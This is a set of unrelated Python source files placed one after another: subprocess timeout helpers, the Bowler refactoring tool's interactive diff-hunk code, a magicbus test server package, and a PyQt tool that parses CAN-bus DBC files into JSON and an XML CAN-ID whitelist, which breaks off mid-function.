  def _recv(self, which, maxsize, timeout):
    """Reads from one of stdout or stderr synchronously with timeout."""
    conn = getattr(self, which)
    if conn is None:
      return None
    _, data, closed = recv_multi_impl([conn], maxsize, timeout)
    if closed:
      self._close(which)
    if self.universal_newlines and data:
      data = self._translate_newlines(data)
    return data


@contextlib.contextmanager
def set_signal_handler(signals, handler):
  """Temporarilly override signals handler.

  Useful when waiting for a child process to handle signals like SIGTERM, so
  the signal can be propagated to the child process.
  """
  previous = {s: signal.signal(s, handler) for s in signals}
  try:
    yield
  finally:
    # Restore the original handlers. NOTE(review): iteritems() is py2-only.
    for sig, h in previous.iteritems():
      signal.signal(sig, h)


def call(*args, **kwargs):
  """Adds support for timeout."""
  timeout = kwargs.pop('timeout', None)
  return Popen(*args, **kwargs).wait(timeout)


def check_call(*args, **kwargs):
  """Adds support for timeout."""
  retcode = call(*args, **kwargs)
  if retcode:
    raise CalledProcessError(retcode, kwargs.get('args') or args[0])
  return 0


def check_output(*args, **kwargs):
  """Adds support for timeout."""
  timeout = kwargs.pop('timeout', None)
  if 'stdout' in kwargs:
    raise ValueError('stdout argument not allowed, it will be overridden.')
  process = Popen(stdout=PIPE, *args, **kwargs)
  output, _ = process.communicate(timeout=timeout)
  retcode = process.poll()
  if retcode:
    raise CalledProcessError(retcode, kwargs.get('args') or args[0], output)
  return output


def call_with_timeout(args, timeout, **kwargs):
  """Runs an executable; kill it in case of timeout.

  Returns (stdout, stderr, returncode, duration).
  """
  proc = Popen(
      args,
      stdin=subprocess.PIPE,
      stdout=subprocess.PIPE,
      **kwargs)
  try:
    out, err = proc.communicate(timeout=timeout)
  except TimeoutExpired as e:
    # Salvage whatever partial output the exception carries, then kill.
    out = e.output
    err = e.stderr
    proc.kill()
    proc.wait()
  return out, err, proc.returncode, proc.duration()


def inhibit_os_error_reporting():
  """Inhibits error reporting UI and core files.

  This function should be called as early as possible in the process lifetime.
  """
  global _OS_ERROR_REPORTING_INHIBITED
  if not _OS_ERROR_REPORTING_INHIBITED:
    _OS_ERROR_REPORTING_INHIBITED = True
    if sys.platform == 'win32':
      # Windows has a bad habit of opening a dialog when a console program
      # crashes, rather than just letting it crash. Therefore, when a program
      # crashes on Windows, we don't find out until the build step times out.
      # This code prevents the dialog from appearing, so that we find out
      # immediately and don't waste time waiting for a user to close the
      # dialog.
      # https://msdn.microsoft.com/en-us/library/windows/desktop/ms680621.aspx
      SEM_FAILCRITICALERRORS = 1
      SEM_NOGPFAULTERRORBOX = 2
      SEM_NOALIGNMENTFAULTEXCEPT = 0x8000
      ctypes.windll.kernel32.SetErrorMode(
          SEM_FAILCRITICALERRORS|SEM_NOGPFAULTERRORBOX|
          SEM_NOALIGNMENTFAULTEXCEPT)
  # TODO(maruel): Other OSes.
  # - OSX, need to figure out a way to make the following process tree local:
  #   defaults write com.apple.CrashReporter UseUNC 1
  #   defaults write com.apple.CrashReporter DialogType none
  # - Ubuntu, disable apport if needed.


def split(data, sep='\n'):
  """Splits pipe data by |sep|. Does some buffering.

  For example, [('stdout', 'a\nb'), ('stdout', '\n'), ('stderr', 'c\n')] ->
  [('stdout', 'a'), ('stdout', 'b'), ('stderr', 'c')].

  Args:
    data: iterable of tuples (pipe_name, bytes).

  Returns:
    An iterator of tuples (pipe_name, bytes) where bytes is the input data
    but split by sep into separate tuples.
  """
  # A dict {pipe_name -> list of pending chunks without separators}
  pending_chunks = collections.defaultdict(list)
  for pipe_name, chunk in data:
    if chunk is None:
      # Happens if a pipe is closed.
      continue
    pending = pending_chunks[pipe_name]
    start = 0  # offset in chunk to start |sep| search from
    while start < len(chunk):
      j = chunk.find(sep, start)
      if j == -1:
        # No separator left in the chunk; buffer the tail for later.
        pending_chunks[pipe_name].append(chunk[start:])
        break
      to_emit = chunk[start:j]
      start = j + 1
      if pending:
        # prepend and forget
        to_emit = ''.join(pending) + to_emit
        pending = []
        pending_chunks[pipe_name] = pending
      yield pipe_name, to_emit
  # Emit remaining chunks that don't end with separators as is.
  # NOTE(review): iteritems() is py2-only.
  for pipe_name, chunks in sorted(pending_chunks.iteritems()):
    if chunks:
      yield pipe_name, ''.join(chunks)
tool.py
#!/usr/bin/env python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

import difflib
import logging
import multiprocessing
import os
import sys
import time
from queue import Empty
from typing import Any, Iterator, List, Optional, Sequence, Tuple

import click
from fissix import pygram
from fissix.pgen2.parse import ParseError
from fissix.refactor import RefactoringTool, _detect_future_features
from moreorless.patch import PatchException, apply_single_file

from .helpers import filename_endswith
from .types import (
    BadTransform,
    BowlerException,
    BowlerQuit,
    Filename,
    FilenameMatcher,
    Fixers,
    Hunk,
    Processor,
    RetryFile,
)

# Help text for the interactive hunk prompt, keyed by single-char response.
PROMPT_HELP = {
    "y": "apply this hunk",
    "n": "skip this hunk",
    "a": "apply this hunk and all remaining hunks for this file",
    "d": "skip this hunk and all remaining hunks for this file",
    "q": "quit; do not apply this hunk or any remaining hunks",
    "?": "show help",
}

log = logging.getLogger(__name__)


def diff_texts(a: str, b: str, filename: str) -> Iterator[str]:
    """Yield unified-diff lines between texts ``a`` and ``b``.

    ``filename`` is used for both the ``---`` and ``+++`` headers;
    ``lineterm=""`` keeps the yielded lines free of trailing newlines.
    """
    lines_a = a.splitlines()
    lines_b = b.splitlines()
    return difflib.unified_diff(lines_a, lines_b, filename, filename, lineterm="")


def prompt_user(question: str, options: str, default: str = "") -> str:
    """Prompt on stdin until the user gives a single-char answer in ``options``.

    ``default`` (at most one char, must appear in ``options``) is returned on
    an empty response.  "?" prints PROMPT_HELP and re-prompts.
    """
    options = options.lower()
    default = default.lower()
    assert len(default) < 2 and default in options

    if "?" not in options:
        options += "?"

    prompt_options = ",".join(o.upper() if o == default else o for o in options)
    prompt = f"{question} [{prompt_options}]? "
    result = ""
    while True:
        result = input(prompt).strip().lower()
        if result == "?":
            for option in PROMPT_HELP:
                click.secho(f"{option} - {PROMPT_HELP[option]}", fg="red", bold=True)

        elif len(result) == 1 and result in options:
            return result

        elif result:
            click.echo(f'invalid response "{result}"')

        elif default:
            return default


class BowlerTool(RefactoringTool):
    """RefactoringTool that fans work out to worker processes and renders
    each change as interactive unified-diff hunks."""

    NUM_PROCESSES = os.cpu_count() or 1
    IN_PROCESS = False  # set when run DEBUG mode from command line

    def __init__(
        self,
        fixers: Fixers,
        *args,
        interactive: bool = True,
        write: bool = False,
        silent: bool = False,
        in_process: Optional[bool] = None,
        hunk_processor: Optional[Processor] = None,
        filename_matcher: Optional[FilenameMatcher] = None,
        **kwargs,
    ) -> None:
        options = kwargs.pop("options", {})
        super().__init__(fixers, *args, options=options, **kwargs)
        self.queue_count = 0
        self.queue = multiprocessing.JoinableQueue()  # type: ignore
        self.results = multiprocessing.Queue()  # type: ignore
        self.semaphore = multiprocessing.Semaphore(self.NUM_PROCESSES)
        self.interactive = interactive
        self.write = write
        self.silent = silent
        if in_process is None:
            in_process = self.IN_PROCESS
        # pick the most restrictive of flags; we can pickle fixers when
        # using spawn.
        if sys.platform == "win32" or sys.version_info > (3, 7):
            in_process = True
        self.in_process = in_process
        self.exceptions: List[BowlerException] = []
        if hunk_processor is not None:
            self.hunk_processor = hunk_processor
        else:
            # default processor accepts every hunk
            self.hunk_processor = lambda f, h: True
        self.filename_matcher = filename_matcher or filename_endswith(".py")

    def log_error(self, msg: str, *args: Any, **kwds: Any) -> None:
        self.logger.error(msg, *args, **kwds)

    def get_fixers(self) -> Tuple[Fixers, Fixers]:
        """Instantiate fixer classes, split into pre/post-order groups."""
        fixers = [f(self.options, self.fixer_log) for f in self.fixers]
        pre: Fixers = [f for f in fixers if f.order == "pre"]
        post: Fixers = [f for f in fixers if f.order == "post"]
        return pre, post

    def processed_file(
        self, new_text: str, filename: str, old_text: str = "", *args, **kwargs
    ) -> List[Hunk]:
        """Diff old vs new text into hunks and validate the result re-parses.

        Raises BadTransform (carrying the hunks) when the transformed source
        is no longer valid Python.
        """
        self.files.append(filename)
        hunks: List[Hunk] = []
        if old_text != new_text:
            a, b, *lines = list(diff_texts(old_text, new_text, filename))

            hunk: Hunk = []
            for line in lines:
                if line.startswith("@@"):
                    if hunk:
                        hunks.append([a, b, *hunk])
                    hunk = []
                hunk.append(line)

            if hunk:
                hunks.append([a, b, *hunk])

            original_grammar = self.driver.grammar
            if "print_function" in _detect_future_features(new_text):
                self.driver.grammar = pygram.python_grammar_no_print_statement
            try:
                new_tree = self.driver.parse_string(new_text)
                if new_tree is None:
                    raise AssertionError("Re-parsed CST is None")
            except Exception as e:
                raise BadTransform(
                    f"Transforms generated invalid CST for {filename}",
                    filename=filename,
                    hunks=hunks,
                ) from e
            finally:
                self.driver.grammar = original_grammar

        return hunks

    def refactor_file(self, filename: str, *a, **k) -> List[Hunk]:
        """Refactor one file and return its diff hunks; never raises for
        unreadable or unparseable files (logs and returns what it has)."""
        try:
            hunks: List[Hunk] = []
            input, encoding = self._read_python_source(filename)
            if input is None:
                # Reading the file failed.
                return hunks
        except (OSError, UnicodeDecodeError) as e:
            log.error(f"Skipping {filename}: failed to read because {e}")
            return hunks

        try:
            if not input.endswith("\n"):
                input += "\n"
            tree = self.refactor_string(input, filename)
            if tree:
                hunks = self.processed_file(str(tree), filename, input)
        except ParseError as e:
            # BUGFIX: original lacked the f-prefix, so {e} was emitted literally.
            log.exception(f"Skipping {filename}: failed to parse ({e})")

        return hunks

    def refactor_dir(self, dir_name: str, *a, **k) -> None:
        """Descends down a directory and refactor every Python file found.

        Python files are those for which `self.filename_matcher(filename)`
        returns true, to allow for custom extensions.

        Files and subdirectories starting with '.' are skipped.
        """
        for dirpath, dirnames, filenames in os.walk(dir_name):
            self.log_debug("Descending into %s", dirpath)
            dirnames.sort()
            filenames.sort()
            for name in filenames:
                fullname = os.path.join(dirpath, name)
                if not name.startswith(".") and self.filename_matcher(
                    Filename(fullname)
                ):
                    self.queue_work(Filename(fullname))
            # Modify dirnames in-place to remove subdirs with leading dots
            dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]

    def refactor_queue(self) -> None:
        """Worker loop: pull filenames off the queue until a None sentinel.

        Results (or exceptions) are pushed onto self.results; RetryFile
        re-queues the file for a later attempt.
        """
        self.semaphore.acquire()
        while True:
            filename = self.queue.get()

            if filename is None:
                break

            try:
                hunks = self.refactor_file(filename)
                self.results.put((filename, hunks, None))

            except RetryFile:
                self.log_debug(f"Retrying {filename} later...")
                self.queue.put(filename)
            except BowlerException as e:
                log.exception(f"Bowler exception during transform of {filename}: {e}")
                self.results.put((filename, e.hunks, e))
            except Exception as e:
                log.exception(f"Skipping {filename}: failed to transform because {e}")
                self.results.put((filename, [], e))

            finally:
                self.queue.task_done()
        self.semaphore.release()

    def queue_work(self, filename: Filename) -> None:
        self.queue.put(filename)
        self.queue_count += 1

    def refactor(self, items: Sequence[str], *a, **k) -> None:
        """Refactor a list of files and directories."""

        for dir_or_file in sorted(items):
            if os.path.isdir(dir_or_file):
                self.refactor_dir(dir_or_file)
            else:
                self.queue_work(Filename(dir_or_file))

        children: List[multiprocessing.Process] = []
        if self.in_process:
            self.queue.put(None)
            self.refactor_queue()
        else:
            child_count = max(1, min(self.NUM_PROCESSES, self.queue_count))
            self.log_debug(f"starting {child_count} processes")
            for i in range(child_count):
                child = multiprocessing.Process(target=self.refactor_queue)
                child.start()
                children.append(child)
                self.queue.put(None)

        results_count = 0

        while True:
            try:
                filename, hunks, exc = self.results.get_nowait()
                results_count += 1

                if exc:
                    self.log_error(f"{type(exc).__name__}: {exc}")
                    if exc.__cause__:
                        self.log_error(
                            f"  {type(exc.__cause__).__name__}: {exc.__cause__}"
                        )
                    if isinstance(exc, BowlerException) and exc.hunks:
                        diff = "\n".join("\n".join(hunk) for hunk in exc.hunks)
                        self.log_error(f"Generated transform:\n{diff}")
                    self.exceptions.append(exc)
                else:
                    self.log_debug(f"results: got {len(hunks)} hunks for {filename}")
                    self.process_hunks(filename, hunks)

            except Empty:
                if self.queue.empty() and results_count == self.queue_count:
                    break

                elif not self.in_process and not any(
                    child.is_alive() for child in children
                ):
                    # NOTE: removed extraneous f-prefix (no placeholders)
                    self.log_debug("child processes stopped without consuming work")
                    break

                else:
                    time.sleep(0.05)

            except BowlerQuit:
                for child in children:
                    child.terminate()
                break

        self.log_debug("all children stopped and all diff hunks processed")

    def process_hunks(self, filename: Filename, hunks: List[Hunk]) -> None:
        """Render hunks, optionally prompt the user, and apply accepted ones."""
        auto_yes = False
        result = ""
        accepted_hunks = ""
        for hunk in hunks:
            if self.hunk_processor(filename, hunk) is False:
                continue

            if not self.silent:
                for line in hunk:
                    if line.startswith("---"):
                        click.secho(line, fg="red", bold=True)
                    elif line.startswith("+++"):
                        click.secho(line, fg="green", bold=True)
                    elif line.startswith("-"):
                        click.secho(line, fg="red")
                    elif line.startswith("+"):
                        click.secho(line, fg="green")
                    else:
                        click.echo(line)

                if self.interactive:
                    if auto_yes:
                        click.echo(f"Applying remaining hunks to {filename}")
                        result = "y"
                    else:
                        result = prompt_user("Apply this hunk", "ynqad", "n")

                    self.log_debug(f"result = {result}")

                    if result == "q":
                        self.apply_hunks(accepted_hunks, filename)
                        raise BowlerQuit()
                    elif result == "d":
                        self.apply_hunks(accepted_hunks, filename)
                        return  # skip all remaining hunks
                    elif result == "n":
                        continue
                    elif result == "a":
                        auto_yes = True
                        result = "y"
                    elif result != "y":
                        raise ValueError("unknown response")

            if result == "y" or self.write:
                accepted_hunks += "\n".join(hunk[2:]) + "\n"

        self.apply_hunks(accepted_hunks, filename)

    def apply_hunks(self, accepted_hunks, filename):
        """Patch ``filename`` in place with the accumulated accepted hunks."""
        if accepted_hunks:
            with open(filename) as f:
                data = f.read()
            try:
                accepted_hunks = f"--- {filename}\n+++ {filename}\n{accepted_hunks}"
                new_data = apply_single_file(data, accepted_hunks)
            except PatchException as err:
                log.exception(f"failed to apply patch hunk: {err}")
                return
            with open(filename, "w") as f:
                f.write(new_data)

    def run(self, paths: Sequence[str]) -> int:
        """Run the refactor over ``paths``; return a shell-style exit code."""
        if not self.errors:
            self.refactor(paths)
            self.summarize()

        return int(bool(self.errors or self.exceptions))
__init__.py
"""Regression test suite for magicbus. Run 'nosetests -s test/' to exercise all tests. """ from magicbus.compat import HTTPServer, HTTPConnection, HTTPHandler import os from subprocess import Popen import threading import time from magicbus.plugins import SimplePlugin def assertEqual(x, y, msg=None): if not x == y: raise AssertionError(msg or '%r != %r' % (x, y)) def assertNotEqual(x, y, msg=None): if x == y: raise AssertionError(msg or '%r == %r' % (x, y)) class Process(object): def __init__(self, args): self.args = args self.process = None def start(self): # Exceptions in the child will be re-raised in the parent, # so if you're expecting one, trap this call and check for it. cwd = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..')) env = os.environ.copy() env['PYTHONPATH'] = cwd self.process = Popen(self.args, env=env) def stop(self): if self.process is not None: self.process.kill() def join(self): return self.process.wait() class WebServer(HTTPServer): def stop(self): """Stops the serve_forever loop without waiting.""" # Sigh. Really, standard library, really? Double underscores? 
self._BaseServer__shutdown_request = True def handle_error(self, request, client_address): # Simulate unsafe servers that don't trap errors well raise class WebService(object): def __init__(self, address=('127.0.0.1', 8000), handler_class=None): self.address = address self.handler_class = handler_class self.httpd = None self.ready = False def start(self): self.httpd = WebServer(self.address, self.handler_class) self.ready = True self.httpd.serve_forever() def stop(self): if self.httpd is not None: self.httpd.stop() self.httpd = None self.ready = False def do_GET(self, uri): conn = HTTPConnection(*self.address) try: conn.request('GET', uri) return conn.getresponse() finally: conn.close() class WebAdapter(SimplePlugin): def __init__(self, bus, service): self.bus = bus self.service = service def START(self): threading.Thread(target=self.service.start).start() self.wait() # Make sure we start httpd after the daemonizer and pidfile. START.priority = 75 def STOP(self): self.service.stop() STOP.priority = 25 def wait(self): """Wait until the HTTP server is ready to receive requests.""" while not getattr(self.service, 'ready', False): time.sleep(.1) class WebHandler(HTTPHandler): def log_request(self, code='-', size='-'): HTTPHandler.log_request(self, code, size) def respond(self, body=None, status=200, headers=None): if headers is None: headers = [] if body is not None: if isinstance(body, str): body = body.encode('utf-8') if 'Content-Length' not in (k for k, v in headers): headers.append(('Content-Length', str(len(body)))) self.send_response(status) for k, v in headers: self.send_header(k, v) self.end_headers() if body is not None: self.wfile.write(body) def handle(self, *args, **kwargs): self.bus.publish('acquire_thread') HTTPHandler.handle(self)
Data.py
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import tkinter as tk
from tkinter import filedialog
import xml.dom.minidom
import os
import re
import threading
import copy
import json
import time
import pandas as pd
import xml.etree.ElementTree as ET


class test(QWidget):
    """Small progress-bar window shown while a DBC file is being parsed."""

    def __init__(self):
        super(test, self).__init__()

    def setupUi(self, path):
        # Fixed-size window: a progress bar on top and a status label below.
        self.setFixedSize(400, 63)
        self.main_widget = QtWidgets.QWidget(self)
        self.label = QtWidgets.QLabel(self.main_widget)
        self.setWindowTitle('解析中...')
        self.label.setText("    ")
        self.label.move(10, 44)
        self.progressBar = QtWidgets.QProgressBar(self.main_widget)
        self.progressBar.setGeometry(QtCore.QRect(10, 10, 380, 30))
        self.flag = 0
        self.thread_2 = threading.Thread(target=self.toclose)
        self.thread_2.start()
        # Create and start the parsing worker thread.
        try:
            self.thread_1 = Data(path)
            self.thread_1.progressBarValue.connect(self.copy_file)
            self.thread_1.start()
            time.sleep(0.1)
            # Data.join() re-raises any exception the worker recorded so far;
            # it only catches failures that happen within the first ~0.1 s.
            self.thread_1.join()
        except Exception as e:
            self.label.setText("解析失败")
            self.flag = 1
        self.thread_3 = threading.Thread(target=self.x)
        self.thread_3.start()

    def x(self):
        # Watchdog: poll until the worker finishes (or the closer thread dies),
        # then mark failure unless success was already reported.
        while not self.thread_1.isFinished() or not self.thread_2.is_alive():
            time.sleep(1)
            continue
        else:
            if self.label.text() == '解析成功':
                return
            else:
                self.label.setText("解析失败")
                time.sleep(1)
                self.close()

    def copy_file(self, i):
        # Slot for Data.progressBarValue: update the bar; 100 means done.
        self.progressBar.setValue(i)
        if i == 100:
            time.sleep(0.25)
            self.label.setText("解析成功")
            self.flag = 1

    def toclose(self):
        # Close the window shortly after self.flag is raised.
        while self.flag != 1:
            time.sleep(0.5)
            continue
        else:
            time.sleep(1)
            self.close()


class Data(QThread):
    """Worker thread that parses a DBC file into JSON and builds XML output."""

    progressBarValue = pyqtSignal(int)  # progress-bar update signal (0-100)

    def __init__(self, path):
        # path: path to the .dbc file; key: its basename without extension,
        # used to name the generated .json/.xml files.
        self.path = path
        self.key = path.split("/")[-1].split(".")[0]
        self.xmlpath = ''
        super(Data, self).__init__()
        self.exc = None  # sys.exc_info() tuple captured inside run()

    def join(self):
        """Re-raise (with traceback) any exception recorded by run()."""
        if self.exc:
            # BUGFIX: original did `"Error: %s"(self.exc[1])`, calling the
            # string object and raising TypeError instead of the real error.
            msg = "Error: %s" % (self.exc[1],)
            new_exc = Exception(msg)
            raise new_exc.with_traceback(self.exc[2])

    # Parse the DBC file.
    def run(self):
        che = {}
        canId = []
        sender = []
        receiverID = []
        cycleTimeId = []
        signalList = []
        name = []
        cycleTime = []
        startBit = []
        length = []
        note = []
        receiver = []
        path = self.path
        with open(path, 'rb') as f:
            # cur_encoding = chardet.detect(f.read(10000))['encoding']
            # print(cur_encoding)
            values = f.read().decode('gbk', errors='replace')  # whole file text
        # Extract canId, name, sender, startBit, length, receiver per message.
        result = re.findall(r'(BO_\s\w*\s\w*:\s\w\s\w*)((?:.|\n)*?)(?=BO_)', values, re.M)
        for i in result:
            a = i[1].replace('" ', '" ')
            canId.append(re.findall(r'(?<=BO_\s)\w*(?=\s)', str(i), re.I))
            name.append(re.findall(r'(?<=SG_\s)\w+(?=\s:)', str(i), re.M))
            sender.append(re.findall(r'(?<=:\s\w\s)\w*', str(i), re.M))
            startBit.append(re.findall(r'(?<=\s:\s)\d*(?=\\|)', str(i), re.M))
            length.append(re.findall(r"(?<=\d\|)\d*(?=@)", str(i), re.M))
            receiver.append(re.findall(r'(?<=" )[\w,]*', a, re.S))
        # Resolve each message's receiver list and GenMsgCycleTime.
        # cycleTimeId.append(
        #     re.findall(r'(?<=BA_ "GenMsgCycleTime" BO_ ' + canId[i][0] + '\s)\d+(?=;)', values, re.M))
        try:
            for i in range(len(result)):
                c = re.findall(r'(?<=BA_ "GenMsgCycleTime" BO_ ' + canId[i][0] + '\s)\d+(?=;)', values, re.M)
                if c != []:
                    cycleTimeId.append(c)
                else:
                    cycleTimeId.append(['0'])
                b = []
                if receiver[i] != []:
                    for j in range(len(name[i])):
                        a = receiver[i][j].split(',')
                        for k in range(len(a)):
                            b.append(a[k])
                    receiverID.append(list(set(b)))
                else:
                    a = []
                    receiverID.append(a)
            cycleTimeId[0] = [0]
        except Exception as e:
            # Record the failure for join() and leave time to display it.
            self.exc = sys.exc_info()
            time.sleep(3.5)
            return
        # Resolve per-signal cycleTime and note (comment) attributes.
        for i in range(len(result)):
            a = []
            b = []
            for j in range(len(name[i])):
                a1 = (re.findall(r'(?<=BA_ "GenSigCycleTime" SG_ ' + canId[i][0] + '\s' + name[i][j] + '\s)\d*(?=;)',
                                 values, re.I))
                b1 = (re.findall(r'(?<=CM_ SG_ ' + canId[i][0] + '\s' + name[i][j] + ')(\s+"(?:.|\n)*?")(?=;)',
                                 values, re.M))
                if not a1:
                    a1 = ['0']
                if not b1:
                    b1 = ['None']
                a.append(a1[0])
                b.append(b1[0].replace('\r\n', '').replace('"', '').replace(' ', ''))
            cycleTime.append(a)
            note.append(b)
            k = ((i + 1) / len(result)) * 100 * 0.95
            if k >= 95:
                time.sleep(1)
                break
            # BUGFIX: the signal is declared pyqtSignal(int); emit an int,
            # not the float produced by the percentage arithmetic.
            self.progressBarValue.emit(int(k))
            # print(k)
            # print('loading...%.2f' % k, "%")
        # Build the per-message signalList dictionaries.
        try:
            for i in range(len(result)):
                lis = []
                for j in range(len(name[i])):
                    # A fresh dict per signal (the original built it via a
                    # pointless deepcopy of an empty dict).
                    dic2_copy = {}
                    dic2_copy["name"] = name[i][j]
                    dic2_copy["cycleTime"] = int(cycleTime[i][j])
                    dic2_copy["startBit"] = int(startBit[i][j])
                    dic2_copy["length"] = int(length[i][j])
                    dic2_copy["note"] = note[i][j]
                    dic2_copy["receiver"] = receiver[i][j]
                    lis.append(dic2_copy)
                signalList.append(lis)
            # Outer per-message dictionary keyed by numeric canId.
            for i in range(len(result)):
                dic_copy = {}
                dic_copy["canId"] = int(canId[i][0])
                dic_copy["sender"] = sender[i][0]
                # NOTE: "reciver" key spelling is kept — the JSON consumers
                # already depend on it.
                dic_copy["reciver"] = receiverID[i]
                dic_copy["signalList"] = signalList[i]
                dic_copy["cycleTime"] = int(cycleTimeId[i][0])
                if int(canId[i][0]) < 10000:
                    che[int(canId[i][0])] = dic_copy
        except Exception as e:
            self.exc = sys.exc_info()
            # print(e)
            # print(self.exc)
            time.sleep(3.5)
            return
        # Save the parsed result as <key>.json in the current directory.
        with open('.\\' + self.key + '.json', 'w', encoding='utf-8') as fp:
            json.dump(che, fp)
        k = 100
        self.progressBarValue.emit(k)

    # Build one table row for the given CAN id.
    def json_to_table(self, can, time, sample):
        # NOTE: the `time` parameter shadows the time module (unused here).
        table = pd.read_json('.\\' + self.key + '.json', encoding='utf-8')
        timeout = time * table.loc["cycleTime"][can]
        sampleCycle = sample * table.loc["cycleTime"][can]
        rolingcounterStartBit = 0
        rolingcounterLenth = 0
        crcStartBit = 0
        crcLenth = 0
        priority = 3
        # Last signal whose name contains 'Rolling' wins.
        for i in range(len(table.loc["signalList"][can])):
            if r'Rolling' in table.loc["signalList"][can][i]["name"]:
                index = i
                rolingcounterStartBit = table.loc["signalList"][can][index]["startBit"]
                rolingcounterLenth = table.loc["signalList"][can][index]["length"]
        # Last signal whose name contains 'Check' wins.
        for j in range(len(table.loc["signalList"][can])):
            if r'Check' in table.loc["signalList"][can][j]["name"]:
                index = j
                crcStartBit = table.loc["signalList"][can][index]["startBit"]
                crcLenth = table.loc["signalList"][can][index]["length"]
        data_row = [can, timeout, sampleCycle, rolingcounterStartBit, rolingcounterLenth,
                    crcStartBit, crcLenth, priority]
        return data_row

    # Build the XML whitelist template from a DataFrame and save it to disk.
    def xml_example(self, df):
        whitelists = list(df["canId"])
        timeouts = list(df["timeout"])
        sampleCycles = list(df["sampleCycle"])
        rollingcounterStartBits = list(df["rollingcounterStartBit"])
        rollingcounterLenths = list(df["rollingcounterLenth"])
        crcStartBits = list(df["crcStartBit"])
        crcLenths = list(df["crcLenth"])
        prioritys = list(df["priority"])
        t = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))
        doc = xml.dom.minidom.Document()
        rootnode = doc.createElement('root')
        data = doc.createElement('data')
        respStatus = doc.createElement('respStatus')
        respStatus.appendChild(doc.createTextNode('OK'))
        errorCode = doc.createElement('errorCode')
        errorCode.appendChild(doc.createTextNode(''))
        errorMsg = doc.createElement('errorMsg')
        errorMsg.appendChild(doc.createTextNode(''))
        confTimestamp = doc.createElement('confTimestamp')
        confTimestamp.appendChild(doc.createTextNode(str(t)))
        moduleSwitch = doc.createElement('moduleSwitch')
        moduleSwitch.appendChild(doc.createTextNode('true'))
        doc.appendChild(rootnode)
        rootnode.appendChild(respStatus)
        rootnode.appendChild(errorCode)
        rootnode.appendChild(errorMsg)
        rootnode.appendChild(confTimestamp)
        rootnode.appendChild(moduleSwitch)
        rootnode.appendChild(data)
        for i in range(len(whitelists)):
            canIdWhiteList = doc.createElement('canIdWhiteList')
            canId = doc.createElement('canId')
            canId.appendChild(doc.createTextNode(str(whitelists[i])))
            timeout = doc.createElement('timeout')
            timeout.appendChild(doc.createTextNode(str(timeouts[i])))
            sampleCycle = doc.createElement('sampleCycle')
            sampleCycle.appendChild(doc.createTextNode(str(sampleCycles[i])))
            rollingcounterStartBit = doc.createElement('rollingcounterStartBit')
            rollingcounterStartBit.appendChild(doc.createTextNode(str(rollingcounterStartBits[i])))
            rollingcounterLenth = doc.createElement('rollingcounterLenth')
            rollingcounterLenth.appendChild(doc.createTextNode(str(rollingcounterLenths[i])))
            crcStartBit = doc.createElement('crcStartBit')
            crcStartBit.appendChild(doc.createTextNode(str(crcStartBits[i])))
            crcLenth = doc.createElement('crcLenth')
            crcLenth.appendChild(doc.createTextNode(str(crcLenths[i])))
            priority = doc.createElement('priority')
            priority.appendChild(doc.createTextNode(str(prioritys[i])))
            canIdWhiteList.appendChild(canId)
            canIdWhiteList.appendChild(timeout)
            canIdWhiteList.appendChild(sampleCycle)
            canIdWhiteList.appendChild(rollingcounterStartBit)
            canIdWhiteList.appendChild(rollingcounterLenth)
            canIdWhiteList.appendChild(crcStartBit)
            canIdWhiteList.appendChild(crcLenth)
            canIdWhiteList.appendChild(priority)
            data.appendChild(canIdWhiteList)
        try:
            root = tk.Tk()
            root.withdraw()
            path = filedialog.asksaveasfilename(defaultextension='.xml', initialdir='C:\\',
                                                initialfile=self.key + '.xml',
                                                parent=root, title='xml模板另存为')
            if not path:
                # User cancelled the save dialog; nothing to write.
                return
            # BUGFIX: the original called the non-existent os.mkdirs() *after*
            # open() had already created the file.  Ensure the target
            # directory exists before opening for write instead.
            dirname = os.path.dirname(path)
            if dirname:
                os.makedirs(dirname, exist_ok=True)
            with open(path, 'w') as fp:
                doc.writexml(fp, indent='\t', addindent='\t', newl='\n', encoding="utf-8")
            self.xmlpath = path
        except Exception as e:
            # print(e)
            return
        return self.xmlpath

    def search_by_id(self, id):
        """Return [canId, name, note] rows for signals of message `id`,
        excluding CRC/RollingCounter/Checksum bookkeeping signals."""
        table = pd.read_json('.\\' + self.key + '.json', encoding='utf-8')
        data = []
        ban_name = ['crc', 'Rolling', 'Check']
        for i in range(len(table.loc['signalList'][id])):
            if all(ba not in table.loc["signalList"][id][i]["name"] for ba in ban_name):
                name = table.loc["signalList"][id][i]["name"]
                note = table.loc["signalList"][id][i]["note"]
                row = [id, name, note]
                data.append(row)
        return data

    def search_by_word(self, word):
        """Return [canId, name, note] rows for all signals whose name
        contains `word`, excluding CRC/RollingCounter/Checksum signals."""
        table = pd.read_json('.\\' + self.key + '.json', encoding='utf-8')
        data = []
        ban_name = ['crc', 'Rolling', 'Check']
        # NOTE(review): relies on fixed row order of the read-back JSON
        # (iloc[3] == the signalList row) — verify against the JSON layout.
        for i in range(len(table.iloc[0])):
            for j in table.iloc[3].values[i]:
                if word in j['name']:
                    if all(ba not in j['name'] for ba in ban_name):
                        name = j['name']
                        note = j['note']
                        id = table.iloc[3].index[i]
                        row = [id, name, note]
                        data.append(row)
        return data

    # Build an <uploadRuleList> element for the upload rules.
    def uploadrulelist(self, ulp=1000, ulCN=60, sd=8, md=3, py=3, zg='true', **kwargs):
        # Required kwargs: 'dataframe' (rows of canId/name/note) and 'flag'
        # (0 = auto collection, 1 = periodic by kwargs['RUN_TIME'], else none).
        uploadRuleList = ET.Element("uploadRuleList")
        # uploadRuleList = ET.SubElement(data, 'uploadRuleList')
        collectionCondition = ET.SubElement(uploadRuleList, 'collectionCondition')
        for i in kwargs['dataframe'].values:
            collectionContent = ET.SubElement(uploadRuleList, 'collectionContent')
            collectionContent.text = i[1]
            canId = ET.SubElement(uploadRuleList, 'canId')
            canId.text = str(i[0])
            note = ET.SubElement(uploadRuleList, 'note')
            note.text = str(i[2])
        uploadCondition = ET.SubElement(uploadRuleList, 'uploadCondition')
        uploadPeriod = ET.SubElement(uploadCondition, 'uploadPeriod')
        uploadContentNumber = ET.SubElement(uploadCondition, 'uploadContentNumber')
        trigger = ET.SubElement(uploadCondition, 'trigger')
        event = ET.SubElement(trigger, 'event')
